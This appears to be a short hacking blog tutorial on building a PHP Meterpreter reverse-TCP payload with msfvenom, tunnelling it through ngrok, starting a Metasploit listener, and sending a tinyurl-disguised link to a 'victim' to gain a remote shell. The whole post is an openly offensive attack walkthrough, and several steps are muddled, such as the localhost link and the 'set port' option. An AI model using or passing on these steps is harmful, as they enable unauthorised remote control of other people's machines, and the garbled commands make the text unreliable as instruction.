Hackers Repository

Hacking with with php payloads and ngrok

Hey lads today were hacking with php we will be using msfvenom payload .

lets start by downloading ngrok and installing it on the system so click this link https://ngrok.com/download .

now follow the instructions to install ngrok .

so now we open terminal and type ngrok tcp 4545 or what ever port u want to use

now lets make are payload

 msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=17928 R > home.php

now type service postgrsql start

service apache2 start

now type

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 127.0.0.1

set port 17928

now copy the php file to /var/www/html

now type exploit in msfconsole

now go to tinyurl.com and shorten the like 127.0.0.1:17928 send it to the victim

send the link tiny url gave u https://tinyurl.com/yagmvsly once they click the link boom you got them

hope u enjoyed this lads more to come happy hacking and remember hack the planet

To Top

Pin It on Pinterest

Share This